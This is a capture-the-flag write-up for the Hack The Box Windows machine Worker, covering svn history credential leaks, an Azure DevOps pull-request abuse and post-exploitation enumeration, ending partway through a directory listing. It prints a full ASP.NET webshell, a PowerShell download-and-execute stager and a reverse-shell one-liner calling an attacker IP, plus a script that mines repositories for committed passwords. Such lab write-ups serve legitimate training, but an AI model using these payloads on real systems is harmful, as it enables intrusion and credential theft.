HTB - Worker

Zweilosec's writeup of the medium-difficulty Windows machine Worker from https://hackthebox.eu

Overview

Worker leaks credentials twice through poor version-control hygiene. A Subversion repository on port 3690 keeps a password in its revision history, and an Azure DevOps instance hosted on the same box lets that user merge an .aspx webshell into one of the sites IIS serves, giving a shell as the application-pool identity. A second set of credentials sits in the svnserve passwd file on a data drive; the WinRM user it yields can define an Azure Pipeline that a self-hosted build agent runs as SYSTEM. The one strange thing to deal with is the portal's cleanup: branches and pull requests get wiped frequently, so the upload-approve-merge sequence has to be worked through quickly.

Useful Skills and Tools

Interactive Windows Command/Tool List

WADComs is an interactive cheat sheet, containing a curated list of offensive security tools and their respective commands, to be used against Windows/AD environments.

Subversion command-line client

  • svn checkout svn://<host> pulls a working copy over the svnserve protocol (port 3690), and svn log followed by svn diff -r N:M exposes every revision's changes, including secrets that were committed and later removed.

evil-winrm

  • evil-winrm -u <user> -p <password> -i <host> gives an interactive PowerShell session over WinRM (port 5985) once you hold a credential for a member of Remote Management Users.

Enumeration

Nmap scan

I started my enumeration with an nmap scan of 10.10.10.203. The options I used here were: -p-, which is a shortcut that tells nmap to scan all 65535 ports; -sCV, which combines -sC (the equivalent of --script=default, running a collection of nmap enumeration scripts against the target) with -sV (service and version detection); -n, which skips reverse-DNS lookups; and -v for verbose progress output. I normally also add -oA <name> to save the output in all three formats with a filename of <name>, but left it off for this run.
┌──(zweilos㉿kali)-[~/htb/worker]
└─$ nmap -sCV -n -p- -v 10.10.10.203
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-28 18:40 EST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 18:40
Completed NSE at 18:40, 0.00s elapsed
Initiating NSE at 18:40
Completed NSE at 18:40, 0.00s elapsed
Initiating NSE at 18:40
Completed NSE at 18:40, 0.00s elapsed
Initiating Ping Scan at 18:40
Scanning 10.10.10.203 [2 ports]
Completed Ping Scan at 18:40, 0.06s elapsed (1 total hosts)
Initiating Connect Scan at 18:40
Scanning 10.10.10.203 [65535 ports]
Discovered open port 80/tcp on 10.10.10.203
Connect Scan Timing: About 18.58% done; ETC: 18:42 (0:02:16 remaining)
Connect Scan Timing: About 46.95% done; ETC: 18:42 (0:01:09 remaining)
Discovered open port 5985/tcp on 10.10.10.203
Discovered open port 3690/tcp on 10.10.10.203
Completed Connect Scan at 18:41, 105.47s elapsed (65535 total ports)
Initiating Service scan at 18:41
Scanning 3 services on 10.10.10.203
Completed Service scan at 18:42, 6.09s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.10.203.
Initiating NSE at 18:42
Completed NSE at 18:42, 1.01s elapsed
Initiating NSE at 18:42
Completed NSE at 18:42, 0.20s elapsed
Initiating NSE at 18:42
Completed NSE at 18:42, 0.00s elapsed
Nmap scan report for 10.10.10.203
Host is up (0.044s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3690/tcp open svnserve Subversion
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
NSE: Script Post-scanning.
Initiating NSE at 18:42
Completed NSE at 18:42, 0.00s elapsed
Initiating NSE at 18:42
Completed NSE at 18:42, 0.00s elapsed
Initiating NSE at 18:42
Completed NSE at 18:42, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.30 seconds
Three ports were open: 80 (HTTP on IIS 10.0), 3690 (Subversion's svnserve), and 5985 (HTTP on Microsoft-HTTPAPI 2.0, which is the WinRM listener).

Port 80 - HTTP

There was nothing but the default IIS page on port 80, and dirbuster revealed nothing of use. With name-based virtual hosts in play (as turned out to be the case here), brute-forcing directories against the bare IP only ever sees the default site; the real content needs a Host header for one of the vhost names.

Port 3690 - Subversion

To get a working copy, you must check out some subtree of the repository. (The term check out may sound like it has something to do with locking or reserving resources, but it doesn't; it simply creates a working copy of the project for you.) For example, if you check out /calc, you will get a working copy like this:
$ svn checkout http://svn.example.com/repos/calc
A    calc/Makefile
A    calc/integer.c
A    calc/button.c
Checked out revision 56.
I installed the Subversion client with sudo apt install subversion.
┌──(zweilos㉿kali)-[~/htb/worker]
└─$ svn checkout http://10.10.10.203
svn: E170013: Unable to connect to a repository at URL 'http://10.10.10.203'
svn: E175003: The server at 'http://10.10.10.203' does not support the HTTP/DAV protocol
I was not able to connect to the repository over HTTP (that needs the mod_dav_svn Apache front end, which this host is not running), but after some reading found that svnserve speaks its own svn:// protocol on port 3690.
┌──(zweilos㉿kali)-[~/htb/worker]
└─$ svn checkout svn://10.10.10.203
A dimension.worker.htb
A dimension.worker.htb/LICENSE.txt
A dimension.worker.htb/README.txt
A dimension.worker.htb/assets
A dimension.worker.htb/assets/css
A dimension.worker.htb/assets/css/fontawesome-all.min.css
A dimension.worker.htb/assets/css/main.css
A dimension.worker.htb/assets/css/noscript.css
A dimension.worker.htb/assets/js
A dimension.worker.htb/assets/js/breakpoints.min.js
A dimension.worker.htb/assets/js/browser.min.js
A dimension.worker.htb/assets/js/jquery.min.js
A dimension.worker.htb/assets/js/main.js
A dimension.worker.htb/assets/js/util.js
A dimension.worker.htb/assets/sass
A dimension.worker.htb/assets/sass/base
A dimension.worker.htb/assets/sass/base/_page.scss
A dimension.worker.htb/assets/sass/base/_reset.scss
A dimension.worker.htb/assets/sass/base/_typography.scss
A dimension.worker.htb/assets/sass/components
A dimension.worker.htb/assets/sass/components/_actions.scss
A dimension.worker.htb/assets/sass/components/_box.scss
A dimension.worker.htb/assets/sass/components/_button.scss
A dimension.worker.htb/assets/sass/components/_form.scss
A dimension.worker.htb/assets/sass/components/_icon.scss
A dimension.worker.htb/assets/sass/components/_icons.scss
A dimension.worker.htb/assets/sass/components/_image.scss
A dimension.worker.htb/assets/sass/components/_list.scss
A dimension.worker.htb/assets/sass/components/_table.scss
A dimension.worker.htb/assets/sass/layout
A dimension.worker.htb/assets/sass/layout/_bg.scss
A dimension.worker.htb/assets/sass/layout/_footer.scss
A dimension.worker.htb/assets/sass/layout/_header.scss
A dimension.worker.htb/assets/sass/layout/_main.scss
A dimension.worker.htb/assets/sass/layout/_wrapper.scss
A dimension.worker.htb/assets/sass/libs
A dimension.worker.htb/assets/sass/libs/_breakpoints.scss
A dimension.worker.htb/assets/sass/libs/_functions.scss
A dimension.worker.htb/assets/sass/libs/_mixins.scss
A dimension.worker.htb/assets/sass/libs/_vars.scss
A dimension.worker.htb/assets/sass/libs/_vendor.scss
A dimension.worker.htb/assets/sass/main.scss
A dimension.worker.htb/assets/sass/noscript.scss
A dimension.worker.htb/assets/webfonts
A dimension.worker.htb/assets/webfonts/fa-brands-400.eot
A dimension.worker.htb/assets/webfonts/fa-brands-400.svg
A dimension.worker.htb/assets/webfonts/fa-brands-400.ttf
A dimension.worker.htb/assets/webfonts/fa-brands-400.woff
A dimension.worker.htb/assets/webfonts/fa-brands-400.woff2
A dimension.worker.htb/assets/webfonts/fa-regular-400.eot
A dimension.worker.htb/assets/webfonts/fa-regular-400.svg
A dimension.worker.htb/assets/webfonts/fa-regular-400.ttf
A dimension.worker.htb/assets/webfonts/fa-regular-400.woff
A dimension.worker.htb/assets/webfonts/fa-regular-400.woff2
A dimension.worker.htb/assets/webfonts/fa-solid-900.eot
A dimension.worker.htb/assets/webfonts/fa-solid-900.svg
A dimension.worker.htb/assets/webfonts/fa-solid-900.ttf
A dimension.worker.htb/assets/webfonts/fa-solid-900.woff
A dimension.worker.htb/assets/webfonts/fa-solid-900.woff2
A dimension.worker.htb/images
A dimension.worker.htb/images/bg.jpg
A dimension.worker.htb/images/overlay.png
A dimension.worker.htb/images/pic01.jpg
A dimension.worker.htb/images/pic02.jpg
A dimension.worker.htb/images/pic03.jpg
A dimension.worker.htb/index.html
A moved.txt
Checked out revision 5.
There were quite a few files here, and a subdomain, dimension.worker.htb. I added worker.htb and dimension.worker.htb to my hosts file.
This repository has been migrated and will no longer be maintaned here.
You can find the latest version at: http://devops.worker.htb
// The Worker team :)
The file moved.txt contained a message stating that the repo had been moved to another castle, devops.worker.htb. I added this one to my hosts file as well.
<!-- Work -->
<article id="work">
<h2 class="major">Work</h2>
<span class="image main"><img src="images/pic02.jpg" alt="" /></span>
<p>Curios on what we're currently working on are you? Well let's please you with a couple of teasers.</p>
<a href="http://alpha.worker.htb/">Alpha</a><p>This is our first page</p>
<a href="http://cartoon.worker.htb/">Cartoon</a><p>When we're not working we enjoy watching cartoons. Guess who in our team is what cartoon character!</p>
<a href="http://lens.worker.htb/">Lens</a><p>This page is for you 40+:ers. Can you read it?</p>
<a href="http://solid-state.worker.htb/">Solid State</a><p>We save our data in our datacenter on blazing fast solid-state storage.</p>
<a href="http://spectral.worker.htb/">Spectral</a><p>Sounds almost like one of our favourite agents movies, but we also enjoy Hamilton</p>
<a href="http://story.worker.htb/">Story</a><p>Lets make a long story short, end of story</p>
The file index.html contained another list of subdomains; I added these to my hosts file as well.
Worker homepage using dimension theme
Links to other pages
Cartoon character page, possible usernames? The other pages did not contain anything that looked useful, so I moved on to the devops domain I had found earlier.
The devops page required authentication
┌──(zweilos㉿kali)-[~/htb/worker/devops]
└─$ svn log svn://devops.worker.htb
------------------------------------------------------------------------
r5 | nathen | 2020-06-20 09:52:00 -0400 (Sat, 20 Jun 2020) | 1 line
Added note that repo has been migrated
------------------------------------------------------------------------
r4 | nathen | 2020-06-20 09:50:20 -0400 (Sat, 20 Jun 2020) | 1 line
Moving this repo to our new devops server which will handle the deployment for us
------------------------------------------------------------------------
r3 | nathen | 2020-06-20 09:46:19 -0400 (Sat, 20 Jun 2020) | 1 line
-
------------------------------------------------------------------------
r2 | nathen | 2020-06-20 09:45:16 -0400 (Sat, 20 Jun 2020) | 1 line
Added deployment script
------------------------------------------------------------------------
r1 | nathen | 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020) | 1 line
First version
------------------------------------------------------------------------
Next, I used the log command and found the commit notes that described some of the progress that had been made on the repository.
┌──(zweilos㉿kali)-[~/htb/worker/devops]
└─$ svn diff -r 1
Index: moved.txt
===================================================================
--- moved.txt (nonexistent)
+++ moved.txt (revision 5)
@@ -0,0 +1,5 @@
+This repository has been migrated and will no longer be maintaned here.
+You can find the latest version at: http://devops.worker.htb
+
+// The Worker team :)
+
┌──(zweilos㉿kali)-[~/htb/worker/devops]
└─$ svn diff -r 2
Index: deploy.ps1
===================================================================
--- deploy.ps1 (revision 2)
+++ deploy.ps1 (nonexistent)
@@ -1,6 +0,0 @@
-$user = "nathen"
-$plain = "wendel98"
-$pwd = ($plain | ConvertTo-SecureString)
-$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
-$args = "Copy-Site.ps1"
-Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")
Index: moved.txt
===================================================================
--- moved.txt (nonexistent)
+++ moved.txt (revision 5)
@@ -0,0 +1,5 @@
+This repository has been migrated and will no longer be maintaned here.
+You can find the latest version at: http://devops.worker.htb
+
+// The Worker team :)
+
┌──(zweilos㉿kali)-[~/htb/worker/devops]
└─$ svn diff -r 3
Index: deploy.ps1
===================================================================
--- deploy.ps1 (revision 3)
+++ deploy.ps1 (nonexistent)
@@ -1,7 +0,0 @@
-$user = "nathen"
-# NOTE: We cant have my password here!!!
-$plain = ""
-$pwd = ($plain | ConvertTo-SecureString)
-$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
-$args = "Copy-Site.ps1"
-Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")
\ No newline at end of file
Index: moved.txt
===================================================================
--- moved.txt (nonexistent)
+++ moved.txt (revision 5)
@@ -0,0 +1,5 @@
+This repository has been migrated and will no longer be maintaned here.
+You can find the latest version at: http://devops.worker.htb
+
+// The Worker team :)
+
┌──(zweilos㉿kali)-[~/htb/worker/devops]
└─$ svn diff -r 4
Index: moved.txt
===================================================================
--- moved.txt (nonexistent)
+++ moved.txt (revision 5)
@@ -0,0 +1,5 @@
+This repository has been migrated and will no longer be maintaned here.
+You can find the latest version at: http://devops.worker.htb
+
+// The Worker team :)
+
┌──(zweilos㉿kali)-[~/htb/worker/devops]
└─$ svn diff -r 5
I checked each revision against the current working copy (note that svn diff -r N on its own compares revision N with the checked-out revision 5, which is why moved.txt appears in every diff above; svn diff -r N:M limits the output to what changed between two revisions), and found that at one point a username and password had been hardcoded in the file deploy.ps1:
-$user = "nathen"
-$plain = "wendel98"
This credential set did not work for logging into the devops page, nor for WinRM. After getting no progress for a while, I reset the box and the login worked for the devops page, but still not for WinRM.
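The history review above is worth automating, since the secret is only visible in one revision and the plain diff-against-working-copy output hides which revision introduced or removed it. The following Python script is an added example for this writeup, not tooling from the original: it parses plain svn log output, builds the revision-to-revision diff commands (r0 is the empty root, so r1 is diffed against it), and flags credential-looking assignments in the diff text, pairing each with the most recent user-looking assignment in the same file. The sample log and diff embedded in it are constructed from the output shown on this page, and the secret-name patterns are my own assumptions that will need tuning per target.

```python
"""Mine a Subversion repository's history for credentials that were committed and
later removed. Added example for this writeup; the sample log/diff text below is
constructed from the output shown on the page, and the secret-name patterns are
assumptions to tune per target."""
import re
import subprocess
import sys

LOG_ENTRY = re.compile(r"^r(\d+) \| (\S+) \| ([^|]+) \| \d+ lines?$", re.M)

# one assignment per line, e.g.  -$plain = "wendel98"  or  +password=hunter2
ASSIGN = re.compile(
    r'^(?P<kind>[+\- ])\s*\$?(?P<name>[A-Za-z_]\w*)\s*=\s*'
    r'["\']?(?P<value>[^"\'\s]+)["\']?\s*$'
)
SECRET_NAME = re.compile(r"pass|pwd|plain|secret|token|key|cred", re.I)
USER_NAME = re.compile(r"user|login|account", re.I)
KIND = {"+": "added", "-": "removed", " ": "context"}


def parse_log(log_text):
    """[(rev, author, date), ...] newest first, from plain `svn log` output."""
    return [(int(r), a, d.strip()) for r, a, d in LOG_ENTRY.findall(log_text)]


def revision_pairs(revs):
    """(prev, cur) pairs covering every commit; r0 is the empty root, so r1 diffs against it."""
    return [(r - 1, r) for r in sorted(revs)]


def credentials(diff_text):
    """(file, user, secret, kind) for secret-looking assignments in unified diff text.
    The most recent user-looking assignment in the same file is paired with each hit.
    Empty values ($plain = "") and multi-token right-hand sides are ignored."""
    found, current_file, last_user = [], None, None
    for line in diff_text.splitlines():
        if line.startswith("Index: "):
            current_file, last_user = line[len("Index: "):].strip(), None
            continue
        if line.startswith(("+++ ", "--- ", "@@")):
            continue
        m = ASSIGN.match(line)
        if not m:
            continue
        name, value = m.group("name"), m.group("value")
        if USER_NAME.search(name):
            last_user = value
        elif SECRET_NAME.search(name):
            found.append((current_file, last_user, value, KIND[m.group("kind")]))
    return found


def mine(repo_url):
    """Run svn for real: diff every consecutive revision pair and report credentials."""
    log = subprocess.run(["svn", "log", repo_url], capture_output=True, text=True, check=True).stdout
    revs = [r for r, _, _ in parse_log(log)]
    for prev, cur in revision_pairs(revs):
        diff = subprocess.run(["svn", "diff", "-r", f"{prev}:{cur}", repo_url],
                              capture_output=True, text=True, check=True).stdout
        for path, user, secret, kind in credentials(diff):
            print(f"r{cur} {kind:8} {path}: user={user} secret={secret}")


# constructed from the svn log / svn diff output shown on this page
SAMPLE_LOG = """\
------------------------------------------------------------------------
r3 | nathen | 2020-06-20 09:46:19 -0400 (Sat, 20 Jun 2020) | 1 line

-
------------------------------------------------------------------------
r2 | nathen | 2020-06-20 09:45:16 -0400 (Sat, 20 Jun 2020) | 1 line

Added deployment script
------------------------------------------------------------------------
r1 | nathen | 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020) | 1 line

First version
------------------------------------------------------------------------
"""
SAMPLE_DIFF = """\
Index: deploy.ps1
===================================================================
--- deploy.ps1\t(revision 2)
+++ deploy.ps1\t(revision 3)
@@ -1,6 +1,7 @@
 $user = "nathen"
-$plain = "wendel98"
+# NOTE: We cant have my password here!!!
+$plain = ""
 $pwd = ($plain | ConvertTo-SecureString)
"""

if __name__ == "__main__":
    if len(sys.argv) == 2:
        mine(sys.argv[1])          # e.g. svn://10.10.10.203
    else:
        print(credentials(SAMPLE_DIFF))
```

Run it with the repository URL as the only argument to walk the live history; with no argument it scans the embedded sample and reports the removed wendel98 value from r2 to r3.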

The Azure DevOps Portal

After logging in, I found myself in an Azure DevOps portal as the user named ekenas.
When I clicked on the profile picture, I found the user's name and domain login information.
I checked through the user's settings, but there wasn't anything useful.
Under the ekenas repository, there was a project for something called SmartHotel360
Under the Members section of the project I found icons for 2 other users.
template for a page?
Under SmartHotel360 there was a mostly empty project called w45ty45t.
In all, I found three usernames and a possible password, w45ty45t.

Crafting an .aspx reverse shell

None of the usernames or potential passwords got me anywhere, so I began to look closer at what I was able to do in the SmartHotel360 repository.
The portal takes a lot of screenshots to describe, so in short, I had to:
1. Create a new branch.
2. Upload the file to the new branch.
3. Add a work item to the commit.
4. Approve the commit (pull request).
5. Wait for the build to complete.
6. Merge with master.
7. Navigate to the webshell.
TF402455: Pushes to this branch are not permitted; you must use a pull request to update this branch.
Tried to push a file uploaded through the web portal but got the above message
Tried creating a new branch of the project called test.
The build takes so long that the cleanup runs before there is time to do anything... (I think I must have finished creating my test branch just before the cleanup script, or whatever it is, cleared it the first time I did this.)
Next I created a new pull request, trying to upload an .aspx file to see if I could get code execution.
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string ExcuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdExe_Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>
<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
<!-- http://michaeldaw.org 04/2007 -->
The asp.net webshell by Dominic Chell, downloaded from https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmdasp.aspx.
After I submitted the pull request I had to approve it. Luckily this user had the necessary permissions.
I approved the pull request and completed it. If you have problems, make sure to check the Policies section on the right, as it lists checks that have to be met first.
My test branches were deleted multiple times before I figured out the rhythm of the portal and how to do everything.
Tried to access my web shell, but it said it wasn't there...
Next I merged my test branch into the master
After a lot of trial and error, I was able to upload my webshell, and tried to run a reverse shell script from my attack machine.
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.15.98:8909/revShell.ps1')"
I put this command into the webshell input as a stager to fetch my reverse shell PowerShell script from my waiting Python HTTP server.
┌──(zweilos㉿kali)-[~/htb/worker]
└─$ python3 -m http.server 8909
Serving HTTP on 0.0.0.0 port 8909 (http://0.0.0.0:8909/) ...
10.10.10.203 - - [12/Dec/2020 17:35:03] "GET /revShell.ps1 HTTP/1.1" 200 -
I got a connection to my waiting web server, which hosted the reverse shell .ps1 script.
$client = New-Object System.Net.Sockets.TCPClient("10.10.15.98",8099);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
My PowerShell script consisted of a reverse shell one-liner found on https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3#gistcomment-3391254

Initial Foothold

┌──(zweilos㉿kali)-[~/htb/worker]
└─$ script
Script started, output log file is 'typescript'.
┌──(zweilos㉿kali)-[~/htb/worker]
└─$ nc -lvnp 8099
listening on [any] 8099 ...
connect to [10.10.15.98] from (UNKNOWN) [10.10.10.203] 50339
whoami /all
USER INFORMATION
----------------
User Name SID
========================== =============================================================
iis apppool\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-82-0 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\windows\system32\inetsrv>
I was able to get a reverse shell after uploading and running my PowerShell script!
I was logged in as the service account iis apppool\defaultapppool. SeImpersonatePrivilege sounded interesting: on an IIS application-pool identity it is the precondition for the potato family of token-impersonation escalations to SYSTEM, although the route taken here goes through a user credential instead.

Road to User

Further enumeration

PS C:\windows\system32\inetsrv> net user
User accounts for \\
-------------------------------------------------------------------------------
aaralf abrall aceals
adaama Administrator aidang
ainann alaann aleapp
alearb alearm aliart
aliaru alkash alpast
alyath alyath1 amaauc
amaave amaayr ancbal
andbal andbal1 andogi
angbal angban aniban
annbar annbar1 antbar
aribar aribar1 aribar2
armbar ashbea ashbea1
ashbec audbec audbed
aurbee autbel baibel
baiben beaber becbet
belbev benbev bevbig
biabil blabin brabin
brabir brabir1 brebla
brebla1 bribla briblo
bribog brobol brobol1
brobon cadbos caibou
calbou calboy calbra
cambra cambra1 carbre
carbre1 carbre2 carbri
carbri1 carbri2 carbri3
carbri4 carbro casbro
casbro1 casbro2 catbro
ceabro chabro chabry
chabuc chebuc chebuc1
chebuc2 chlbud chrbun
chrbur chrbur1 ciebur
clabur codbur colbur
colbur1 conbur conbus
corbut coubux coucad
daical dakcal dakcar
damcar dancar dancaw
dancax darcay darcha
davcha dawcha DefaultAccount
descha descha1 devche
devche1 domche dreche
drechi drechi1 dulchu
duscla dylcla eglcla
elacle elicli elicli1
eloclu emecob emecob1
emicoc emlcoc emlcof
emmcog ericol ericol1
ericol2 estcol ethcol
evacol fabcon faicon
fracon gabcoo gabcor
garcor gavcor gercor
gidcot gilcou giocov
glecra gracra gracra1
Guest guycro hancro
hancro1 harcul haycum
haycun heacup heldag
herdal holdal hondan
hopdar iandav indde
iridea isaden isader
jacdev jacdev1 jaddig
jaidin jamd'o jamdol
jandol jandor jardud
jasdum jasdun jaydun
jazdun jendun jerdup
jesdur jesdur1 jesdur2
jesdut joddyk jodeas
johebe johock jonedg
jonelp jonely josemm
josesh joseto judeur
juleve jusewe kadfai
kalfal karfal kasfan
katfar katfay katfel
katfer kayfif keafif
keafil keefla keifle
keifli kelfoo kelfor
kelfor1 kelfos kenfot
kenfot1 kenfot2 keofre
kerfro kerful khaful
kiogan kirgar kirgar1
kodgar kylgas lacgav
langet langih laugil
laugir lavgir leigla
leigle leigli lesglo
lesgoa levgor liagou
liagra lingra lingre
lyngri machad machai
madhal madhal1 maehal
makhal makham makham1
malham malhan malhan1
marhar marhar1 mathar
mauhar mayhar meghar
melhas melhas1 michat
michat1 mikhat mirhat
morhav morhay nadhed
naohed nathel nathen
nather nather1 neihey
nichin nichin1 noahip
nuahip oakhol o'bhol
owehol paihol parhol
parhol1 pathop pauhor
payhos perhou peyhou
phihou quehub quihud
rachul raehun ramhun
ranhut rebhyd reeinc
reeing reiing renipr
restorer rhiire riairv
ricisa robish robisl
robive ronkay rubkei
rupkel ryakel sabken
samken sapket sarkil
sarkil1 scakin scokin
seakin seckir shakir
shakir1 shakir2 shekno
shikyl sielac skylan
skylan1 slolay slolec
solleg soplel stelev
sutlew tallew tamley
tanlin tanlin1 taylin
taylin1 taylin2 teslip
teslis theliv tholon
timlud timman todman
tremar tremas tremay
trimay trimea trimed
tylmer vanmey vanmid
vanmid1 vanmil waymor
WDAGUtilityAccount vedmil vermil
wesmos wesmox whimun
whimun1 whinai wianan
vicmil vicmof vicmon
wilnee wilnew vinmon
virmor wyanis xavnog
xennor xzynor zacnor
zacnor1 zagnor zeonor
zitnot zoeoak
The command completed with one or more errors.
The net user command showed a very long list of usernames.
PS C:\windows\system32\inetsrv> ls \users
Directory: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2020-03-28 14:59 .NET v4.5
d----- 2020-03-28 14:59 .NET v4.5 Classic
d----- 2020-08-18 00:33 Administrator
d-r--- 2020-03-28 14:01 Public
d----- 2020-07-22 01:11 restorer
d----- 2020-07-08 19:22 robisl
However, there were only three user folders: robisl, restorer, and Administrator.
PS C:\users\restorer> get-psdrive -psprovider filesystem
Name Used (GB) Free (GB) Provider Root CurrentLocation
---- --------- --------- -------- ---- ---------------
C 19,66 9,74 FileSystem C:\ users\restorer
W 2,52 17,48 FileSystem W:\
There was a second logical disk attached to the machine
PS W:\> ls
Directory: W:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2020-06-16 18:59 agents
d----- 2020-03-28 14:57 AzureDevOpsData
d----- 2020-04-03 11:31 sites
d----- 2020-06-20 16:04 svnrepos
It looked like this was where the svn repos were stored.
PS W:\> tree sites
Folder PATH listing for volume Work
Volume serial number is E82A-AEA8
W:\SITES
├───alpha.worker.htb
│   ├───assets
│   │   ├───css
│   │   │   └───images
│   │   ├───js
│   │   ├───sass
│   │   │   └───libs
│   │   └───webfonts
│   └───images
├───cartoon.worker.htb
│   ├───css
│   │   ├───ie
│   │   └───images
│   ├───fonts
│   ├───images
│   └───js
├───dimension.worker.htb
│   ├───assets
│   │   ├───css
│   │   ├───js
│   │   ├───sass
│   │   │   ├───base
│   │   │   ├───components
│   │   │   ├───layout
│   │   │   └───libs
│   │   └───webfonts
│   └───images
├───lens.worker.htb
│   ├───assets
│   │   ├───css
│   │   │   └───images
│   │   ├───js
│   │   ├───sass
│   │   │   ├───base
│   │   │   ├───components
│   │   │   ├───layout
│   │   │   └───libs
│   │   └───webfonts
│   └───images
│       ├───fulls
│       └───thumbs
├───solid-state.worker.htb
│   ├───assets
│   │   ├───css
│   │   │   └───images
│   │   ├───js
│   │   ├───sass
│   │   │   ├───base
│   │   │   ├───components
│   │   │   ├───layout
│   │   │   └───libs
│   │   └───webfonts
│   └───images
├───spectral.worker.htb
│   ├───assets
│   │   ├───css
│   │   │   └───images
│   │   ├───js
│   │   ├───sass
│   │   │   └───libs
│   │   └───webfonts
│   └───images
├───story.worker.htb
│   ├───assets
│   │   ├───css
│   │   ├───js
│   │   ├───sass
│   │   │   ├───base
│   │   │   ├───components
│   │   │   ├───layout
│   │   │   └───libs
│   │   └───webfonts
│   └───images
│       └───gallery
│           ├───fulls
│           └───thumbs
└───twenty.worker.htb
    ├───assets
    │   ├───css
    │   │   └───images
    │   ├───js
    │   ├───sass
    │   │   └───libs
    │   └───webfonts
    └───images
I found the data for the websites in the sites folder, one directory per vhost, including a twenty.worker.htb that was not linked from the index page.
PS W:\> tree /F svnrepos
Folder PATH listing for volume Work
Volume serial number is E82A-AEA8
W:\SVNREPOS
└───www
    │   format
    │   README.txt
    │
    ├───conf
    │       authz
    │       hooks-env.tmpl
    │       passwd
    │       svnserve.conf
    │
    ├───db
    │   │   current
    │   │   format
    │   │   fs-type
    │   │   fsfs.conf
    │   │   min-unpacked-rev
    │   │   rep-cache.db
    │   │   rep-cache.db-journal
    │   │   txn-current
    │   │   txn-current-lock
    │   │   uuid
    │   │   write-lock
    │   │
    │   ├───revprops
    │   │   └───0
    │   │           0
    │   │           1
    │   │           2
    │   │           3
    │   │           4
    │   │           5
    │   │
    │   ├───revs
    │   │   └───0
    │   │           0
    │   │           1
    │   │           2
    │   │           3
    │   │           4
    │   │           5
    │   │
    │   ├───transactions
    │   └───txn-protorevs
    ├───hooks
    │       post-commit.tmpl
    │       post-lock.tmpl
